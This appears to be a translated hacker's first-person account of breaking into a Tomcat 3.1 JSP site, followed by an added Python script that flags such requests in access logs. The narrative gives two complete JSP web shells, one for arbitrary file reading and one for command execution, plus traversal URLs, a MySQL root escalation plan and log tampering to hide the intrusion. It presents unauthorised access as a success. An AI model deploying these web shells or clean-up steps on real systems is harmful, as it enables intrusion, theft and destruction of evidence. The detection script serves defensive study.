By chance I came across a website with fresh, pleasant-looking pages. The site was developed in JSP,
and out of personal interest I decided to take a look at the security of the system.
telnet www.target.com 8080
GET /maid HTTP/1.1
[Enter]
[Enter]
The returned results are as follows:
HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2.2.12 i386; java.vendor=Blackdown Java-Linux Team)
Content-Language: en
Content-Type: text/html
Status: 404
<H1>Error: 404</H1><H2>Location: /chinansl</H2>File not found<br>/chinansl
That gave me the name and version of the running web server: "Tomcat 3.1". I remembered that I had once found a vulnerability
in this version and posted it to Bugtraq.
Roughly: you can escape the web directory using the ".." trick. So:
http://target:8080/.../../%00.jsp (NO)
http://target:8080/file/index.jsp (NO)
http://target:8080/index.jsp (NO)
http://target:8080/index.jsp%81 (NO)
http://target:8080/index.js%70 (NO)
http://target:8080/index.jsp%2581 (NO)
http://target:8080/WEB-INF/ (NO)
Well, try something else! Tomcat 3.1 ships with a management tool that lets you view the directories and files on the web server
and add contexts. Try: http://target:8080/admin/
The administrator had neither deleted this directory nor blocked access to it :-( Error!!!!!
Clicking the "view all context" button lists the names of some of the files and directories under the web directory.
After reading through it carefully, I quickly found a file upload component. Hey, write a JSP file and get it up there.
Look.
I wrote this in the time it takes to drink a few cups of coffee:
<%@ page import="java.io.*" %>
<%
    // Reads the file named by the ?file= parameter and echoes it line by line
    // to the browser, with the privileges of the servlet container's user.
    String file = request.getParameter("file");
    String str = "";
    FileInputStream fs = null;
    DataInputStream dis = null;
    try {
        fs = new FileInputStream(file);
        dis = new DataInputStream(fs);
        while (true) {
            try {
                str = dis.readLine();
            } catch (Exception e) {}
            if (str == null) break;
            out.print(str + "<br>");
        }
    } catch (IOException e) {}
%>
Upload the JSP file into the other side's web directory through the upload component, and then:
http://target:8080/upload/test.jsp?file=/etc/passwd
Hey, the passwd file is out. I only read "/etc/passwd" and did not read "/etc/shadow", because
a web server is generally started as nobody. (Wrong!)
What came next was the boring business of guessing passwords, which failed. Forget it; I only need to know what it means.
If you have a shell, you don't need to guess the password, so IE is my shell environment!
Write again:
<%@ page import="java.io.*" %>
<%
    // Runs the ?cmd= parameter as a process and streams its stdout back
    // to the browser; it runs as whatever user the servlet container runs as.
    try {
        String cmd = request.getParameter("cmd");
        Process child = Runtime.getRuntime().exec(cmd);
        InputStream in = child.getInputStream();
        int c;
        while ((c = in.read()) != -1) {
            out.print((char) c);
        }
        in.close();
        try {
            child.waitFor();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    } catch (IOException e) {
        System.err.println(e);
    }
%>
Then upload this JSP file through the upload component again. Hey, now I have a shell.
http://target:8080/upload/cmd.jsp?cmd=ls+-la+/
(I won't list the output here.)
How to get root? After some searching I found that MySQL was installed on the system, and I got the
MySQL password from the source code of the JSP pages :) Let's see what privileges MySQL is running with:
http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld
Display:
Root 87494 0.2 1.9 17300 4800 P0-s 28jun01. 72/usr/local/data/MySQL
Hey, there's a way. The system runs MySQL as root, and I know the MySQL password.
I could write a shell program, create a table, put my data into the table, and then use
"SELECT ... INTO OUTFILE;" to create a file on the system, so that when the admin runs su,
my program runs. (Do you remember how apache.org was intruded? The hacker used this method.)
Then I would upload a program such as a bindshell, run it to get nobody privileges, and then use
the setuid shell created by root to make myself root.
Hey, a nice way. I'm proud of my ideas ......
What came next almost made me vomit blood:
I typed: http://target:8080/upload/cmd.jsp?cmd=id
Display:
uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)
Damn: my web shell is root. I'm speechless at the administrator, and at myself. It turned out to be such a mess.
Such a long way round, ah!
http://target:8080/upload/cmd.jsp?cmd=ps+aux
It was running as root (not listed).
The remaining things:
1. Delete my telnet records.
2. Delete the HTTP logs.
To clear the logs I used cat xxx | grep -v "ip" > temp, then used temp to overwrite
the log files that I had touched.
I didn't change his page, because I'm not a hacker, not a cracker, but a network security
fan. So, send an email to the system admin!
Of course, by the way, I mentioned in the letter that we would be very happy to provide him with security services if needed!
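Every step of the chain above, from the "/admin/" context listing to the uploaded JSP being called with file= and cmd= parameters, leaves a line in the web server's access log, which is exactly why the last step was to remove those lines. As an added example (not code from the original article), this Python script runs a few detection rules modelled on the requests in the write-up over constructed Common Log Format lines; the sample lines, the log format and the rule names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed Common Log Format lines modelled on the requests in the
# write-up (assumption: Tomcat logging in CLF); none are real target data.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jul/2001:07:49:13 +0000] "GET /maid HTTP/1.1" 404 120
10.0.0.5 - - [08/Jul/2001:07:50:02 +0000] "GET /.../..%2F%00.jsp HTTP/1.0" 404 120
10.0.0.5 - - [08/Jul/2001:07:51:10 +0000] "GET /admin/ HTTP/1.0" 200 2310
10.0.0.5 - - [08/Jul/2001:07:55:41 +0000] "GET /upload/test.jsp?file=/etc/passwd HTTP/1.0" 200 1740
10.0.0.5 - - [08/Jul/2001:07:58:03 +0000] "GET /upload/cmd.jsp?cmd=ps+aux+|grep+mysqld HTTP/1.0" 200 350
10.0.0.9 - - [08/Jul/2001:08:01:00 +0000] "GET /index.jsp HTTP/1.0" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is a name plus a predicate over the fully URL-decoded request path.
RULES = [
    ("admin-context", lambda p: p.lower() == "/admin" or p.lower().startswith("/admin/")),
    ("traversal-or-null", lambda p: "../" in p or "\x00" in p),
    ("web-inf-access", lambda p: "/web-inf" in p.lower()),
    # A JSP under the upload directory invoked with a file= or cmd= parameter.
    ("upload-jsp-param", lambda p: re.match(r"/upload/[^?]+\.jsp\?(file|cmd)=", p, re.I) is not None),
]

def classify(path):
    """Return the names of all rules the request path triggers."""
    decoded = unquote(unquote(path))  # decode twice so %2581-style tricks are seen as %81
    return [name for name, pred in RULES if pred(decoded)]

def scan(log_text):
    """Return a list of (ip, timestamp, raw path, rule names) for suspicious lines."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            tags = classify(m["path"])
            if tags:
                hits.append((m["ip"], m["ts"], m["path"], tags))
    return hits

if __name__ == "__main__":
    for ip, ts, path, tags in scan(SAMPLE_LOG):
        print(ip, ts, path, "->", ", ".join(tags))
```

Because the attacker's own clean-up targeted these files, such rules are only useful when the access log is shipped off the host as it is written rather than read back later from local disk.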